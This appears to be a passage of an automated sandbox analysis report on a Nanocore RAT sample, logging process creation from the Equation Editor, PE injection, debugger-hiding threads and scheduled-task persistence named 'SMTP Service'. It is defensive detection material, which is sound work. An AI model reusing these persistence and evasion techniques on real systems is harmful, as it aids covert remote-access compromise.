        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\JNM.exeWindow / User API: threadDelayed 7741Jump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeWindow / User API: threadDelayed 1930Jump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeWindow / User API: foregroundWindowGot 372Jump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeWindow / User API: foregroundWindowGot 357Jump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeWindow / User API: foregroundWindowGot 576Jump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 920Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exe TID: 2928Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exe TID: 2856Thread sleep time: -4611686018427385s >= -30000sJump to behavior
        Source: C:\Windows\System32\taskeng.exe TID: 2376Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 3024Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exe TID: 3068Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2424Thread sleep time: -120000s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2512Thread sleep time: -922337203685477s >= -30000s
        Source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging:

        barindex
        Contains functionality to hide a thread from the debuggerShow sources
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 3_2_00400AC4 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,00408D77,00000000,000000003_2_00400AC4
        Hides threads from debuggersShow sources
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory written: C:\Users\user\AppData\Roaming\JNM.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory written: C:\Users\user\AppData\Roaming\JNM.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory written: C:\Program Files (x86)\SMTP Service\smtpsvc.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1Jump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp'Jump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5A32.tmp'Jump to behavior
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe 0Jump to behavior
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0Jump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exeJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: JNM.exe, 00000003.00000002.2356855208.0000000000ED0000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2356969483.0000000000ED0000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356001884.00000000007E0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2356959800.0000000000ED0000.00000002.00000001.sdmpBinary or memory string: Program Manager
        Source: JNM.exe, 00000003.00000002.2356855208.0000000000ED0000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2356969483.0000000000ED0000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356001884.00000000007E0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2356959800.0000000000ED0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: JNM.exe, 00000003.00000002.2356855208.0000000000ED0000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2356969483.0000000000ED0000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356001884.00000000007E0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2356959800.0000000000ED0000.00000002.00000001.sdmpBinary or memory string: !Progman
        Source: C:\Users\user\AppData\Roaming\JNM.exeQueries volume information: C:\Users\user\AppData\Roaming\JNM.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeQueries volume information: C:\Users\user\AppData\Roaming\JNM.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeQueries volume information: C:\Users\user\AppData\Roaming\JNM.exe VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeQueries volume information: C:\Users\user\AppData\Roaming\JNM.exe VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\JNM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY
